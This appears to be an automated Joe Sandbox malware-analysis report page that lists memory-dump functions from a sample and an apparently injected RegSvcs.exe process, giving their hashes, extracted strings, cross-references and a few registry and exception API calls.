Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.919356766.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_dropped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f651f904b55a1491c5294547439a04ee4a5b7c5bfa77dd78624f71968c66eaa0
Instruction ID: 942b1a4d3f7372fbf99cb864d6b925c04eeffd70572324dfeffaa1f958266b99
Opcode Fuzzy Hash: f651f904b55a1491c5294547439a04ee4a5b7c5bfa77dd78624f71968c66eaa0
Instruction Fuzzy Hash: 7C01A438D0D14DCBCB10DFB8D4806FDBBB9AB0A320F202629D549A7383C7789881DB40

Uniqueness

Uniqueness Score: -1.00%

Function 007F7FA0 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.919356766.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_dropped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebba505246ea8873199d12ecbdda7f4c1653c4d8d1344a4c48ba301de0f4eb88
Instruction ID: 3406379f1c3d8cdb1cdc02efc151bdf4b367704c75bc3014b97d75e545f24271
Opcode Fuzzy Hash: ebba505246ea8873199d12ecbdda7f4c1653c4d8d1344a4c48ba301de0f4eb88
Instruction Fuzzy Hash: CDF06230A0810CAFC744EFA8E54567EB7F9EB49305F1085689609E3345DB749A05DB51

Uniqueness

Uniqueness Score: -1.00%

Function 000FD0E0 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.918958561.00000000000FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fd000_dropped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0a5a12fd44f23f206572bdad762f5157370724f3bb1c19d90359fbf2a7c6514
Instruction ID: ac757fc8a11b995eb2f9def7ab422a91bf4f3bcb9fcad70e231351449d564547
Opcode Fuzzy Hash: a0a5a12fd44f23f206572bdad762f5157370724f3bb1c19d90359fbf2a7c6514
Instruction Fuzzy Hash: 0AF0C231404248AAEB218A15CCC8B73FFD8EB82724F18C55BEE081B286C3789C40CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 007F05D1 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.919356766.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_dropped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7149e3ee94947136c8c64411266a8a004f32a5e66dc12473cc224e9c3e2f9f69
Instruction ID: 38cc36066b1ddc7223411ef767ee182bcb46cfb8b12df58fe5185576230f8d0d
Opcode Fuzzy Hash: 7149e3ee94947136c8c64411266a8a004f32a5e66dc12473cc224e9c3e2f9f69
Instruction Fuzzy Hash: 33F0873490D258CBDB04EF20C884BB9BBB6FB4A301F1091E9C509A7396C7785D40DF20

Uniqueness

Uniqueness Score: -1.00%

Function 007F0F38 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.919356766.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_dropped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edf07a48e5c5b5a3877dfe7d3887e1cd03755f103a7013fc0faf5bbf8ab1cf68
Instruction ID: 0abb19d076abf2da3e3acbf13ca801d9f5d284e7994f1c7a8c6ffc73f6f1a950
Opcode Fuzzy Hash: edf07a48e5c5b5a3877dfe7d3887e1cd03755f103a7013fc0faf5bbf8ab1cf68
Instruction Fuzzy Hash: 5BF05E34D08208AFC701DFA8D89169DBFF0EF4A204F1084EAC888D7352D7355A95CB82

Uniqueness

Uniqueness Score: -1.00%

Function 007F05EC Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.919356766.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_dropped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2148ccbfaea738dda6df069315a1075875cc8b480a6504cae0d47600400f887
Instruction ID: e17ceb54b49287f6daebfe8cfcc80dee5efb7db30514a02ff5cbe726d5a6abbb
Opcode Fuzzy Hash: a2148ccbfaea738dda6df069315a1075875cc8b480a6504cae0d47600400f887
Instruction Fuzzy Hash: F3F08C3081D228CFDB149F20DC48BBDB7B5BB05305F1091AAD20A97352C7785A40DF50

Uniqueness

Uniqueness Score: -1.00%

Function 007F1279 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.919356766.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_dropped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e3046b3bcbe469e70cb279e48f1156d43f64189aeafadb41fae4c72e4eb4d30
Instruction ID: cdd495fa9624f4589818febe6c28ca14ee0b6a3543b97c0d99285bf60d30ab84
Opcode Fuzzy Hash: 9e3046b3bcbe469e70cb279e48f1156d43f64189aeafadb41fae4c72e4eb4d30
Instruction Fuzzy Hash: 4AF0A030D08288DFCB02CBA8D9A469CBFB0EF46204F1481EECC8897352C3314A01CB42

Uniqueness

Uniqueness Score: -1.00%

Function 007F1E4C Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.919356766.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_dropped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 277c07f3fea65d86c1fd575bec6e614f392dc9ebb5092e6d437b4aa6f72795ea
Instruction ID: 0a419b6cd2adfc5d0fc787edab566bcc1ca7be7b71749133e23a71c886279d38
Opcode Fuzzy Hash: 277c07f3fea65d86c1fd575bec6e614f392dc9ebb5092e6d437b4aa6f72795ea
Instruction Fuzzy Hash: ADF0C47084026DCFCB61DF14DC987ECB7B4BB14305F1046E69509A2261D7740EC0CF50

Uniqueness

Uniqueness Score: -1.00%

Function 007F0928 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.919356766.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_dropped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 123c9609b48cb96523a3bc1a762bc6c0940a9a8a2b1244d627a0bb44e2dad588
Instruction ID: 1a0561a746846dc24e84b488c4de37eb2a265883affaa850444d11a2274025d5
Opcode Fuzzy Hash: 123c9609b48cb96523a3bc1a762bc6c0940a9a8a2b1244d627a0bb44e2dad588
Instruction Fuzzy Hash: 6AE0E53050C2559FCB02CB689CA08A9BF70AF47305F1841EFC44487393C7321955CB81

Uniqueness

Uniqueness Score: -1.00%

Function 007F1308 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.919356766.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_dropped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69e36b353b976e6eaa0243635de238f19207d800d2ea13acd1672a9fc6be48c0
Instruction ID: e8e87da2cbc6809906888cec66e45e82274f846da8fcf646c702a108661324b8
Opcode Fuzzy Hash: 69e36b353b976e6eaa0243635de238f19207d800d2ea13acd1672a9fc6be48c0
Instruction Fuzzy Hash: 53E09234908248DFC705DFA4D95156DBFB4EB46304F2441DDC88497352C7726E82DB91

Uniqueness

Uniqueness Score: -1.00%

Function 007F08A8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.919356766.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_dropped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8f5993f9a863ed6e180a5efa00774226f982ae8ad6d0a078833cd6424e3a477
Instruction ID: 7d7b3c762517b0cdf73587652829da4e2bc5e3f857fbb43b997dc0453139c095
Opcode Fuzzy Hash: a8f5993f9a863ed6e180a5efa00774226f982ae8ad6d0a078833cd6424e3a477
Instruction Fuzzy Hash: 6AE07574E04208EFCB54DFA8D9456ADFBF4EB48304F10C5A9981893341D7759A51CF81

Uniqueness

Uniqueness Score: -1.00%

Function 007F0F48 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.919356766.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_dropped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8f5993f9a863ed6e180a5efa00774226f982ae8ad6d0a078833cd6424e3a477
Instruction ID: 92c39dfe6db0011772f088e83f0362a36d6654ae6e910df4764b3076e455e10f
Opcode Fuzzy Hash: a8f5993f9a863ed6e180a5efa00774226f982ae8ad6d0a078833cd6424e3a477
Instruction Fuzzy Hash: C8E07574E04208EFCB54DFA8D9556ADFBF4EB48304F1085A9981893341D7759A51CF81

Uniqueness

Uniqueness Score: -1.00%

Function 007F0307 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.919356766.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_dropped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b470b1039ed144c5aa6216e716c408924abe8196e2af84fdbae07a5266667ad
Instruction ID: a18ebbf48174a686927cf8fff7fdaa817c753bb54e0ae11235d239af2ada7418
Opcode Fuzzy Hash: 4b470b1039ed144c5aa6216e716c408924abe8196e2af84fdbae07a5266667ad
Instruction Fuzzy Hash: E4E0263090C2489FC702CFA0DC584E4BFB8FB47311B004099D10897222C3681808C761

Uniqueness

Uniqueness Score: -1.00%

Function 007F7440 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.919356766.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_dropped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51bca4b0a239f43211b8cb259ec0fc27a03ab540cc876da9fcf6e8f196eb7c4e
Instruction ID: fe9d5747a10e85ee71352ca3e06a4de701d0f85c99c126d85a4889ea968e2b99
Opcode Fuzzy Hash: 51bca4b0a239f43211b8cb259ec0fc27a03ab540cc876da9fcf6e8f196eb7c4e
Instruction Fuzzy Hash: 4EE04630D0420CEFCB44EFB8D4452ACBBB0EB48304F1085AED818A3340DB355A90CF81

Uniqueness

Uniqueness Score: -1.00%

Function 007F0860 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.919356766.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_dropped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf619a271b6bb55e08e735f0c7ac9c953f551b6932f394e9de3dc3b949b25a3f
Instruction ID: 93ebb6748584953c0ced711e81f437c42b5c35e108b7584a23e759d74625b352
Opcode Fuzzy Hash: cf619a271b6bb55e08e735f0c7ac9c953f551b6932f394e9de3dc3b949b25a3f
Instruction Fuzzy Hash: 0BD0C73180410CEBC710EBB09909AAEB6A9EB05208F0004AACA0893322EB310AA08AD1

Uniqueness

Uniqueness Score: -1.00%

Function 007F7F58 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.919356766.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_dropped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4edb1b06ec14bd6e11f66d993e1c56bd08a8a2270299abc66fffa699f180dad1
Instruction ID: 3fc05b643ae5d2d957cbfe5b37912c10ea266c6c03991a5d5fbc2fbbe3753387
Opcode Fuzzy Hash: 4edb1b06ec14bd6e11f66d993e1c56bd08a8a2270299abc66fffa699f180dad1
Instruction Fuzzy Hash: 2BE08C3490820CEBCB04DFA4E94196CFBB4EB44305F2081ADED4427340CB32AE92DA84

Uniqueness

Uniqueness Score: -1.00%

Function 007F17AB Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.919356766.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_dropped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d6abe0384a447b4224a0a4b1e1f96ead567fea1da3a64d0f522c9a750b0daf6
Instruction ID: 7063a70b2e1ff41c96ba807bd68c912637922d1b0b815f433f8ea302edace7a1
Opcode Fuzzy Hash: 2d6abe0384a447b4224a0a4b1e1f96ead567fea1da3a64d0f522c9a750b0daf6
Instruction Fuzzy Hash: 51F042B4904628CFDB61CF24DC947A9BBB4AB49305F1042DA964DA3210DB311E84CF19

Uniqueness

Uniqueness Score: -1.00%

Function 007F75A0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.919356766.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_dropped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b79f2b4503c8b0fd6f024a2662066fc55730e3a2e5aca7f25ffe1c8a76497006
Instruction ID: 77ec0ff0371bed5af191318ae4f14c8d8a44428433aae8bb42f4fda1240ee44f
Opcode Fuzzy Hash: b79f2b4503c8b0fd6f024a2662066fc55730e3a2e5aca7f25ffe1c8a76497006
Instruction Fuzzy Hash: 1BE01270D0420CDFC744EFB8D94966CBBF4EB04305F2005ADC90893350EB705A90CB91

Uniqueness

Uniqueness Score: -1.00%

Function 007F5520 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.919356766.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_dropped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2213798fc6f0af9deae5247a333517a3c30cf1f2d1dc0acd0964eafc4c7e2872
Instruction ID: 881ca8d6630430702c67e920ad9efc08db52f31c9f855c759a22747beac83cc4
Opcode Fuzzy Hash: 2213798fc6f0af9deae5247a333517a3c30cf1f2d1dc0acd0964eafc4c7e2872
Instruction Fuzzy Hash: CDD06CB4D8056DCFCBA4DF59C951BA9BBF5AB89305F00D4E59818A7702C6309A888F00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 002D65A0 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.918993245.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d0000_dropped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faa9533f6758eb7efc76c3ab733469e610fc5320667c4a735c8a086ab042b382
Instruction ID: cbaabcd220af8ffe30d6e9fbf9b32be5e3e664cf3480a3ced01d3ae88ae4bda1
Opcode Fuzzy Hash: faa9533f6758eb7efc76c3ab733469e610fc5320667c4a735c8a086ab042b382
Instruction Fuzzy Hash: 6E611D709042498FD748EFBAE981AADBBF3AFC9308F04C539D1049B769EF7459458B40

Uniqueness

Uniqueness Score: -1.00%

Function 007F1347 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.919356766.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_dropped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46ad67978005649eb96781ceed125e0c8fe5dd69ad817200cea48274f722f643
Instruction ID: f71a7467fff43f40c41ffb8352141eaad1b69d2a93eeeb7c52149028915b858e
Opcode Fuzzy Hash: 46ad67978005649eb96781ceed125e0c8fe5dd69ad817200cea48274f722f643
Instruction Fuzzy Hash: A2415C71D05A588FEB58CF6B8C5079AFAF3AFC9305F14C1BA854CA6264EB7405828F11

Uniqueness

Uniqueness Score: -1.00%

Function 002D7B38 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.918993245.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d0000_dropped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a579ca32c5e60bf3fef1ad71ca76227020f64b8c4b62c99e9198a9c867ffaeb
Instruction ID: 01f454b9a89d1509d64ac29503a366f09c9e7823d41211b083995f2a12a16f9b
Opcode Fuzzy Hash: 4a579ca32c5e60bf3fef1ad71ca76227020f64b8c4b62c99e9198a9c867ffaeb
Instruction Fuzzy Hash: 04415EB1D156588BEB1CCF6B8D4079EFAF3AFC9300F18C1FA880CAA254DB7509918E41

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegSvcs.exePID: 2260, Parent PID: 1980COMMON

Execution Graph

Execution Coverage:	27.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	235
Total number of Limit Nodes:	12

Executed Functions

Function 0062CAF0 Relevance: 21.0, Strings: 16, Instructions: 1035
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\TU, xrefs: 0062D001
\TU, xrefs: 0062CF11
\TU, xrefs: 0062CED5
\TU, xrefs: 0062D3C5
\TU, xrefs: 0062CF89
\TU, xrefs: 0062D079
\TU, xrefs: 0062D49D
\TU, xrefs: 0062D4FA
\TU, xrefs: 0062D433
\TU, xrefs: 0062CFC5
\TU, xrefs: 0062D5C8
\TU, xrefs: 0062D358
\TU, xrefs: 0062D635
\TU, xrefs: 0062D55F
\TU, xrefs: 0062CF4D
\TU, xrefs: 0062D03D

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID: \TU$\TU$\TU$\TU$\TU$\TU$\TU$\TU$\TU$\TU$\TU$\TU$\TU$\TU$\TU$\TU
API String ID: 0-1040306560
Opcode ID: 7c010d6a1b7b7ae5d9d80e8a15253da6d5a6301fd55a3a3196c98ad39688ef34
Instruction ID: 105e08f34906504acd40d9bfd464e081f5071e72de79857ca8b411c7e460adf7
Opcode Fuzzy Hash: 7c010d6a1b7b7ae5d9d80e8a15253da6d5a6301fd55a3a3196c98ad39688ef34
Instruction Fuzzy Hash: CB92DE34A042448FCB15EB74D8A8BAD7BB2AF84305F1584A9E44ADB791EF34DC86CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0062CE70 Relevance: 20.8, Strings: 16, Instructions: 811
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\TU, xrefs: 0062D001
\TU, xrefs: 0062CF11
\TU, xrefs: 0062CED5
\TU, xrefs: 0062D3C5
\TU, xrefs: 0062CF89
\TU, xrefs: 0062D079
\TU, xrefs: 0062D49D
\TU, xrefs: 0062D4FA
\TU, xrefs: 0062D433
\TU, xrefs: 0062CFC5
\TU, xrefs: 0062D5C8
\TU, xrefs: 0062D358
\TU, xrefs: 0062D635
\TU, xrefs: 0062D55F
\TU, xrefs: 0062CF4D
\TU, xrefs: 0062D03D

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID: \TU$\TU$\TU$\TU$\TU$\TU$\TU$\TU$\TU$\TU$\TU$\TU$\TU$\TU$\TU$\TU
API String ID: 0-1040306560
Opcode ID: d58db6d351f527232c7d897827fbd42e3ff3f72fb1d8f6b6878d32f997666a40
Instruction ID: 7ad836359beb07a92c6a2e1cc3ecfaa38812eddb4395d3cb4397fc5be107a490
Opcode Fuzzy Hash: d58db6d351f527232c7d897827fbd42e3ff3f72fb1d8f6b6878d32f997666a40
Instruction Fuzzy Hash: A4626C74A042148FCB14EB74D8A9AADBBB2FF88305F1484A9E50ADB750DF34DC869F51

Uniqueness

Uniqueness Score: -1.00%

Function 00624DF0 Relevance: 3.3, Strings: 2, Instructions: 786
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

HKU, xrefs: 00624F8C
$JU, xrefs: 00624F9E

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID: $JU$HKU
API String ID: 0-2717613284
Opcode ID: 52345f8238f1f03fb47d074179faf38c1b7623cb4840aa306bc237ea44c1cc51
Instruction ID: ff85b9abbec2b34769a05665b7519509745919ccc48836d87b2b5cde95cc3b59
Opcode Fuzzy Hash: 52345f8238f1f03fb47d074179faf38c1b7623cb4840aa306bc237ea44c1cc51
Instruction Fuzzy Hash: C2620930E007198FCB25EF78D8546EDB7B6AF89314F1185A9D44AAB750EF309A85CF81

Uniqueness

Uniqueness Score: -1.00%

Function 00626928 Relevance: 3.2, Instructions: 3192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8fef5ae5b411091bdc5b379e194599531dbe780d360566760e48b50ae34f27b
Instruction ID: 7059374629b5d2e4872db5bb92f970b616b00c43afe8d9d6e6b7aadff456e97a
Opcode Fuzzy Hash: e8fef5ae5b411091bdc5b379e194599531dbe780d360566760e48b50ae34f27b
Instruction Fuzzy Hash: 6A631E30D14B598ECB10EF68D8846D9F7B1FF95310F15C69AE4586B221EB70AAC4CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0062C330 Relevance: .6, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1c1c4a219ef2bee4ffba0995be243d2876bebd7c44c2e867f898a9cd391c7ec
Instruction ID: 77f1ccc1a63926796045148e7c8374cb25c2fd6f17fd330568417dc6929667d3
Opcode Fuzzy Hash: a1c1c4a219ef2bee4ffba0995be243d2876bebd7c44c2e867f898a9cd391c7ec
Instruction Fuzzy Hash: D822AE30A002588FCB14DFB4D895AADBBF2AF84324F15C169D419EB396DB35EC46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00629E66 Relevance: .4, Instructions: 407COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6483b7d73aa6a126eb83485e53084cb48bc007b3491de0f514ca38087267868f
Instruction ID: 8504f302c1095d348d9d3eb7b1015700f2ba86f90d2dd3080acd69e3d9f58598
Opcode Fuzzy Hash: 6483b7d73aa6a126eb83485e53084cb48bc007b3491de0f514ca38087267868f
Instruction Fuzzy Hash: D4E13630B002249FDB14DBA8D994BAEB7F7AFC8304F158468E415EB395DB74EC458B91

Uniqueness

Uniqueness Score: -1.00%

Function 006248AA Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88a315a1b862438f82204b1db2d943742c8e314dbfac72e55b1c162421cd11c4
Instruction ID: 16e712f776abac350eb907c49f78e27e92da3ab34e3cca8dff094db941f7179b
Opcode Fuzzy Hash: 88a315a1b862438f82204b1db2d943742c8e314dbfac72e55b1c162421cd11c4
Instruction Fuzzy Hash: A3C1D430B045644FEF249BACE8907EE76A7EB99344F218839E505EB785CF38DC458B52

Uniqueness

Uniqueness Score: -1.00%

Function 0062A347 Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef9ae7904b4b6bd695c5d4e72f074ff02405dda1aa86e4784a64405d72745c7e
Instruction ID: 5f60a1bf01045cf2f4b62e74d78a8658813f5c5c713d6aaace4bfb518e66523a
Opcode Fuzzy Hash: ef9ae7904b4b6bd695c5d4e72f074ff02405dda1aa86e4784a64405d72745c7e
Instruction Fuzzy Hash: 19B16734B042149FDB14DBA8D991BAEBBF7AFC8304F19C428E506AB395DB70EC058B51

Uniqueness

Uniqueness Score: -1.00%

Function 003EC1C0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 003EC2D4

Strings

8U, xrefs: 003EC278

Memory Dump Source

Source File: 00000003.00000002.1170932869.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3e0000_RegSvcs.jbxd

Similarity

API ID: Open
String ID: 8U
API String ID: 71445658-3903819036
Opcode ID: 8931d6efd198c52e9a7e2a26220a3767ee94a57a213c54a10e03b94348f98508
Instruction ID: 9feb1069383e49231908c1bfba21c724604385e9cdb7698dc748abbb5c228b3b
Opcode Fuzzy Hash: 8931d6efd198c52e9a7e2a26220a3767ee94a57a213c54a10e03b94348f98508
Instruction Fuzzy Hash: 864146B4D042888FDB11CFA9C488B8EFFF1AF49304F29866AE508AB385D7759945CB51

Uniqueness

Uniqueness Score: -1.00%

Function 003EAC18 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 003EC2D4

Strings

8U, xrefs: 003EC278

Memory Dump Source

Source File: 00000003.00000002.1170932869.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3e0000_RegSvcs.jbxd

Similarity

API ID: Open
String ID: 8U
API String ID: 71445658-3903819036
Opcode ID: 452cf6a55352198725bb228f0058f63989ef0103a3691e57a04e5ef7bc70e1b5
Instruction ID: 87846c4c5c7126156bc40ea322a38bbaa168f2e3b0b10f66910e19b8d930b95b
Opcode Fuzzy Hash: 452cf6a55352198725bb228f0058f63989ef0103a3691e57a04e5ef7bc70e1b5
Instruction Fuzzy Hash: 313101B0D042998FCB10CF9AC584A8EFFF5BF48304F25866AE808AB245C7B59945CB95

Uniqueness

Uniqueness Score: -1.00%

Function 003E786B Relevance: 3.3, APIs: 2, Instructions: 347
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E7DD8
KiUserExceptionDispatcher.NTDLL ref: 003E7E33

Memory Dump Source

Source File: 00000003.00000002.1170932869.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3e0000_RegSvcs.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: b710cc9d51a8dee548c477adf02c54dad4ae0ec1468e0cba6e62b719d69f1c31
